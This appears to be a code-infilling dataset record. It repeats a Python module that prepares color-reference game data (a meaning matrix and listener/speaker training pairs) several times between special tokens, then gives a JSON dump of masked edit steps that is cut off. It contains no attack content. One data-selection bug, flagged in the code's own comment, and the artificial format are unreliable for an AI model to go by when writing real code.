    meaning_mat = np.array(pd.crosstab(df['colors'], df['contents']))
    n_rows, n_cols = meaning_mat.shape
    # Diagnostics: report all-zero rows and every individual zero cell.
    for i in range(n_rows):
        if sum(meaning_mat[i, :]) == 0:
            print('meaning mat is 0 for this row: ', i)
        for j in range(n_cols):
            if meaning_mat[i, j] == 0:
                print('meaning mat is 0 at: ', i, j, ' !!!')
    return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
    """Build (correct_idx, shuffled_colors, utterance) test triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.

    Returns:
        (output, all_utt, desc_to_idx): the triples, the distinct encoded
        utterances, and a mapping from utterance to its index in all_utt.
    """
    all_utt = list(set(list(df['contents'])))
    desc_to_idx = {utterance: i for i, utterance in enumerate(all_utt)}
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
    """Build (correct_idx, shuffled_colors, utterance) training triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.
    Removed the dead locals all_utt/idx_to_desc the original computed and
    never used.
    """
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output
def get_literal_speaker_training_data(df):
    """Build [color, utterance_idx] training pairs for the literal speaker."""
    pairs = []
    for _, row in tqdm(df.iterrows(), total=len(df)):
        target_utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
        click_color = torch.tensor(
            row[['clickColH', 'clickColS', 'clickColL']],
            dtype=torch.float32).to(device)
        pairs.append([click_color, target_utt])
    return pairs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
    """Load the filtered color-reference corpus and label-encode utterances.

    Reads ./data/filteredCorpus.csv, keeps successful human speaker turns,
    restricts to single-word utterances (lowercased, punctuation stripped)
    that occur more than once, and integer-encodes the surviving utterances.

    Returns:
        (df_final, le): the selected rows and the fitted LabelEncoder, so
        callers can map encoded labels back to utterance strings.
    """
    df = pd.read_csv('./data/filteredCorpus.csv')
    # Keep only successful games, speaker turns, and human-generated text.
    df_filt = df[df['outcome'] == True]
    df_filt = df_filt[df_filt['role'] == 'speaker']
    df_filt = df_filt[df_filt['source'] == 'human']
    utt = df_filt['contents']
    # Single-word utterances only, normalized (lowercase, no punctuation).
    utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
    utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
        u in utt_filt]
    # Subtracting one count per distinct utterance keeps only those that
    # appear more than once.
    utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
        str.maketrans('', '', string.punctuation)))
    # NOTE(review): rows are selected from the *unfiltered* df, whose
    # 'contents' were never lowercased/de-punctuated -- presumably df_filt
    # was intended here; confirm against callers before changing behavior.
    # .copy() materializes the selection so the assignment below mutates a
    # real frame instead of a view (avoids SettingWithCopyWarning).
    df_final = df.loc[df['contents'].isin(utt_final)].copy()
    le = LabelEncoder()
    df_final['contents'] = le.fit_transform(df_final['contents'])
    return df_final, le
def get_meaning_matrix(df):
    """Build a color x utterance co-occurrence ("meaning") matrix.

    Mutates *df* in place: adds a label-encoded 'colors' column built from
    the stringified (H, S, L) click-color triple.

    Returns:
        (meaning_mat, colors_le): the num_colors x num_utterances count
        matrix and the fitted LabelEncoder for the color labels.
    """
    hsl_triples = zip(df['clickColH'], df['clickColS'], df['clickColL'])
    df['colors'] = [str(triple) for triple in hsl_triples]
    colors_le = LabelEncoder()
    df['colors'] = colors_le.fit_transform(df['colors'])
    print('length colors and contents', len(df['colors']), len(df['contents']))
    print('set colors and contents', len(set(df['colors'])), len(set(df[
        'contents'])))
    meaning_mat = np.array(pd.crosstab(df['colors'], df['contents']))
    n_rows, n_cols = meaning_mat.shape
    # Diagnostics: report all-zero rows and every individual zero cell.
    for i in range(n_rows):
        if sum(meaning_mat[i, :]) == 0:
            print('meaning mat is 0 for this row: ', i)
        for j in range(n_cols):
            if meaning_mat[i, j] == 0:
                print('meaning mat is 0 at: ', i, j, ' !!!')
    return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
    """Build (correct_idx, shuffled_colors, utterance) test triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.

    Returns:
        (output, all_utt, desc_to_idx): the triples, the distinct encoded
        utterances, and a mapping from utterance to its index in all_utt.
    """
    all_utt = list(set(list(df['contents'])))
    desc_to_idx = {utterance: i for i, utterance in enumerate(all_utt)}
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
    """Build (correct_idx, shuffled_colors, utterance) training triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.
    Removed the dead locals all_utt/idx_to_desc the original computed and
    never used.
    """
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output
def get_literal_speaker_training_data(df):
    """Build [color, utterance_idx] training pairs for the literal speaker."""
    pairs = []
    for _, row in tqdm(df.iterrows(), total=len(df)):
        target_utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
        click_color = torch.tensor(
            row[['clickColH', 'clickColS', 'clickColL']],
            dtype=torch.float32).to(device)
        pairs.append([click_color, target_utt])
    return pairs
<|reserved_special_token_1|>
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
    """Load the filtered color-reference corpus and label-encode utterances.

    Reads ./data/filteredCorpus.csv, keeps successful human speaker turns,
    restricts to single-word utterances (lowercased, punctuation stripped)
    that occur more than once, and integer-encodes the surviving utterances.

    Returns:
        (df_final, le): the selected rows and the fitted LabelEncoder, so
        callers can map encoded labels back to utterance strings.
    """
    df = pd.read_csv('./data/filteredCorpus.csv')
    # Keep only successful games, speaker turns, and human-generated text.
    df_filt = df[df['outcome'] == True]
    df_filt = df_filt[df_filt['role'] == 'speaker']
    df_filt = df_filt[df_filt['source'] == 'human']
    utt = df_filt['contents']
    # Single-word utterances only, normalized (lowercase, no punctuation).
    utt_filt = [u.lower() for u in utt if len(u.split()) == 1]
    utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for
        u in utt_filt]
    # Subtracting one count per distinct utterance keeps only those that
    # appear more than once.
    utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(
        str.maketrans('', '', string.punctuation)))
    # NOTE(review): rows are selected from the *unfiltered* df, whose
    # 'contents' were never lowercased/de-punctuated -- presumably df_filt
    # was intended here; confirm against callers before changing behavior.
    # .copy() materializes the selection so the assignment below mutates a
    # real frame instead of a view (avoids SettingWithCopyWarning).
    df_final = df.loc[df['contents'].isin(utt_final)].copy()
    le = LabelEncoder()
    df_final['contents'] = le.fit_transform(df_final['contents'])
    return df_final, le
def get_meaning_matrix(df):
    """Build a color x utterance co-occurrence ("meaning") matrix.

    Mutates *df* in place: adds a label-encoded 'colors' column built from
    the stringified (H, S, L) click-color triple.

    Returns:
        (meaning_mat, colors_le): the num_colors x num_utterances count
        matrix and the fitted LabelEncoder for the color labels.
    """
    hsl_triples = zip(df['clickColH'], df['clickColS'], df['clickColL'])
    df['colors'] = [str(triple) for triple in hsl_triples]
    colors_le = LabelEncoder()
    df['colors'] = colors_le.fit_transform(df['colors'])
    print('length colors and contents', len(df['colors']), len(df['contents']))
    print('set colors and contents', len(set(df['colors'])), len(set(df[
        'contents'])))
    meaning_mat = np.array(pd.crosstab(df['colors'], df['contents']))
    n_rows, n_cols = meaning_mat.shape
    # Diagnostics: report all-zero rows and every individual zero cell.
    for i in range(n_rows):
        if sum(meaning_mat[i, :]) == 0:
            print('meaning mat is 0 for this row: ', i)
        for j in range(n_cols):
            if meaning_mat[i, j] == 0:
                print('meaning mat is 0 at: ', i, j, ' !!!')
    return meaning_mat, colors_le
def get_pragmatic_listener_testing_data(df):
    """Build (correct_idx, shuffled_colors, utterance) test triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.

    Returns:
        (output, all_utt, desc_to_idx): the triples, the distinct encoded
        utterances, and a mapping from utterance to its index in all_utt.
    """
    all_utt = list(set(list(df['contents'])))
    desc_to_idx = {utterance: i for i, utterance in enumerate(all_utt)}
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
    """Build (correct_idx, shuffled_colors, utterance) training triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.
    Removed the dead locals all_utt/idx_to_desc the original computed and
    never used.
    """
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output
def get_literal_speaker_training_data(df):
    """Build [color, utterance_idx] training pairs for the literal speaker."""
    pairs = []
    for _, row in tqdm(df.iterrows(), total=len(df)):
        target_utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
        click_color = torch.tensor(
            row[['clickColH', 'clickColS', 'clickColL']],
            dtype=torch.float32).to(device)
        pairs.append([click_color, target_utt])
    return pairs
<|reserved_special_token_1|>
from collections import Counter
import pandas as pd
import string
from collections import namedtuple, defaultdict
import csv
import sys
import torch
import numpy as np
from sklearn.preprocessing import LabelEncoder
from scipy.sparse import coo_matrix
from tqdm import tqdm
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
device = 'cpu'
def get_data():
    """Load the filtered color-reference corpus and label-encode utterances.

    Reads ./data/filteredCorpus.csv, keeps successful human speaker turns,
    restricts to single-word utterances (lowercased, punctuation stripped)
    that occur more than once, and integer-encodes the surviving utterances.

    Returns:
        (df_final, le): the selected rows and the fitted LabelEncoder, so
        callers can map encoded labels back to utterance strings.
    """
    df = pd.read_csv("./data/filteredCorpus.csv")
    df_filt = df[df['outcome']==True] # use only successful games
    df_filt = df_filt[df_filt['role']=='speaker'] # use speaker utterances
    df_filt = df_filt[df_filt['source']=='human'] # use human utterances

    # making a list of utterances that we want to use, so we can take these rows from df_filt
    utt = df_filt['contents']
    utt_filt = [u.lower() for u in utt if len(u.split()) == 1] # only use one word utterances
    utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for u in utt_filt] # remove punctuation
    utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys()) # use utterances that appear more than once

    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())
    df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(str.maketrans('', '', string.punctuation)))# filter to take out punctuation
    # NOTE(review): rows are selected from the *unfiltered* df, whose
    # 'contents' were never lowercased/de-punctuated -- presumably df_filt
    # was intended here; confirm against callers before changing behavior.
    # .copy() materializes the selection so the assignment below mutates a
    # real frame instead of a view (avoids SettingWithCopyWarning).
    df_final = df.loc[df['contents'].isin(utt_final)].copy()

    le = LabelEncoder()
    df_final['contents'] = le.fit_transform(df_final['contents'])

    return df_final, le
def get_meaning_matrix(df):
    """Build a color x utterance co-occurrence ("meaning") matrix.

    Mutates *df* in place: adds a label-encoded 'colors' column built from
    the stringified (H, S, L) click-color triple.

    Returns:
        (meaning_mat, colors_le): the num_colors x num_utterances count
        matrix and the fitted LabelEncoder for the color labels.
    """
    hsl_triples = zip(df['clickColH'], df['clickColS'], df['clickColL'])
    df['colors'] = [str(triple) for triple in hsl_triples]
    colors_le = LabelEncoder()
    df['colors'] = colors_le.fit_transform(df['colors'])
    print("length colors and contents", len(df['colors']), len(df['contents']))
    print("set colors and contents", len(set(df['colors'])), len(set(df['contents'])))
    # Rows are colors, columns are utterances; row/column indices correspond
    # to labels from colors_le and the utterance encoder from get_data().
    meaning_mat = np.array(pd.crosstab(df['colors'], df['contents']))
    n_rows, n_cols = meaning_mat.shape
    # Diagnostics: report all-zero rows and every individual zero cell.
    for i in range(n_rows):
        if sum(meaning_mat[i, :]) == 0:
            print("meaning mat is 0 for this row: ", i)
        for j in range(n_cols):
            if meaning_mat[i, j] == 0:
                print("meaning mat is 0 at: ", i, j, " !!!")
    return meaning_mat, colors_le
# Literal listener data function
def get_pragmatic_listener_testing_data(df):
    """Build (correct_idx, shuffled_colors, utterance) test triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.

    Returns:
        (output, all_utt, desc_to_idx): the triples, the distinct encoded
        utterances, and a mapping from utterance to its index in all_utt.
    """
    all_utt = list(set(list(df['contents'])))
    desc_to_idx = {utterance: i for i, utterance in enumerate(all_utt)}
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output, all_utt, desc_to_idx
def get_literal_listener_training_data(df):
    """Build (correct_idx, shuffled_colors, utterance) training triples.

    For each row, the clicked color and the two alternates are stacked in a
    random order; correct_idx records where the clicked color landed.
    Removed the dead locals all_utt/idx_to_desc the original computed and
    never used.
    """
    output = []
    hsl_cols = (['clickColH', 'clickColS', 'clickColL'],
                ['alt1ColH', 'alt1ColS', 'alt1ColL'],
                ['alt2ColH', 'alt2ColS', 'alt2ColL'])
    for _, row in tqdm(df.iterrows(), total=len(df)):
        utt = torch.tensor(row['contents']).to(device)
        candidates = tuple(torch.tensor(row[cols], dtype=torch.float32)
                           for cols in hsl_cols)
        order = np.arange(3)
        np.random.shuffle(order)
        shuffled = torch.stack([candidates[k] for k in order]).to(device)
        # order[0] is wherever the clicked (correct) color ended up.
        target = torch.tensor(order[0], dtype=torch.long).to(device)
        output.append((target, shuffled, utt))
    return output
# Literal Speaker data function - hi r u ok
def get_literal_speaker_training_data(df):
    """Build [color, utterance_idx] training pairs for the literal speaker."""
    pairs = []
    for _, row in tqdm(df.iterrows(), total=len(df)):
        target_utt = torch.tensor(row['contents'], dtype=torch.long).to(device)
        click_color = torch.tensor(
            row[['clickColH', 'clickColS', 'clickColL']],
            dtype=torch.float32).to(device)
        pairs.append([click_color, target_utt])
    return pairs  # [referent, utterance_idx]
|
flexible
|
{
"blob_id": "613b060ee50b49417342cfa70b36f77d112dcc58",
"index": 2951,
"step-1": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\n<mask token>\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = 
torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-2": "<mask token>\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = 
torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-3": "<mask token>\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = colors_le.fit_transform(df['colors'])\n print('length colors and contents', len(df['colors']), len(df['contents']))\n print('set colors and contents', len(set(df['colors'])), len(set(df[\n 'contents'])))\n meaning_mat = pd.crosstab(df['colors'], df['contents'])\n meaning_mat = np.array(meaning_mat)\n for i in range(len(meaning_mat[:, 0])):\n if sum(meaning_mat[i, :]) == 0:\n print('meaning mat is 0 for this row: ', i)\n for j in range(len(meaning_mat[0, :])):\n if meaning_mat[i, j] == 0:\n print('meaning mat is 0 at: ', i, j, ' !!!')\n return meaning_mat, colors_le\n\n\ndef get_pragmatic_listener_testing_data(df):\n output = []\n all_utt = list(set(list(df['contents'])))\n desc_to_idx = {u: i for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = 
torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output, all_utt, desc_to_idx\n\n\ndef get_literal_listener_training_data(df):\n output = []\n all_utt = df['contents']\n idx_to_desc = {i: u for i, u in enumerate(all_utt)}\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents']).to(device)\n correct = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32)\n alt1 = torch.tensor(row[['alt1ColH', 'alt1ColS', 'alt1ColL']],\n dtype=torch.float32)\n alt2 = torch.tensor(row[['alt2ColH', 'alt2ColS', 'alt2ColL']],\n dtype=torch.float32)\n colors = correct, alt1, alt2\n idxs = np.arange(3)\n np.random.shuffle(idxs)\n colors_shuff = torch.stack([colors[idxs[0]], colors[idxs[1]],\n colors[idxs[2]]]).to(device)\n correct_idx = torch.tensor(idxs[0], dtype=torch.long).to(device)\n output.append((correct_idx, colors_shuff, utt))\n return output\n\n\ndef get_literal_speaker_training_data(df):\n output = []\n for _, row in tqdm(df.iterrows(), total=len(df)):\n utt = torch.tensor(row['contents'], dtype=torch.long).to(device)\n color = torch.tensor(row[['clickColH', 'clickColS', 'clickColL']],\n dtype=torch.float32).to(device)\n output.append([color, utt])\n return output\n",
"step-4": "from collections import Counter\nimport pandas as pd\nimport string\nfrom collections import namedtuple, defaultdict\nimport csv\nimport sys\nimport torch\nimport numpy as np\nfrom sklearn.preprocessing import LabelEncoder\nfrom scipy.sparse import coo_matrix\nfrom tqdm import tqdm\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\ndevice = 'cpu'\n\n\ndef get_data():\n df = pd.read_csv('./data/filteredCorpus.csv')\n df_filt = df[df['outcome'] == True]\n df_filt = df_filt[df_filt['role'] == 'speaker']\n df_filt = df_filt[df_filt['source'] == 'human']\n utt = df_filt['contents']\n utt_filt = [u.lower() for u in utt if len(u.split()) == 1]\n utt_filt = [u.translate(str.maketrans('', '', string.punctuation)) for\n u in utt_filt]\n utt_final = list((Counter(utt_filt) - Counter(set(utt_filt))).keys())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.lower())\n df_filt['contents'] = df_filt['contents'].apply(lambda x: x.translate(\n str.maketrans('', '', string.punctuation)))\n df_final = df.loc[df['contents'].isin(utt_final)]\n le = LabelEncoder()\n df_final['contents'] = le.fit_transform(df_final['contents'])\n return df_final, le\n\n\ndef get_meaning_matrix(df):\n df['colors'] = list(zip(df['clickColH'], df['clickColS'], df['clickColL']))\n df['colors'] = df['colors'].apply(lambda x: str(x))\n colors_le = LabelEncoder()\n df['colors'] = 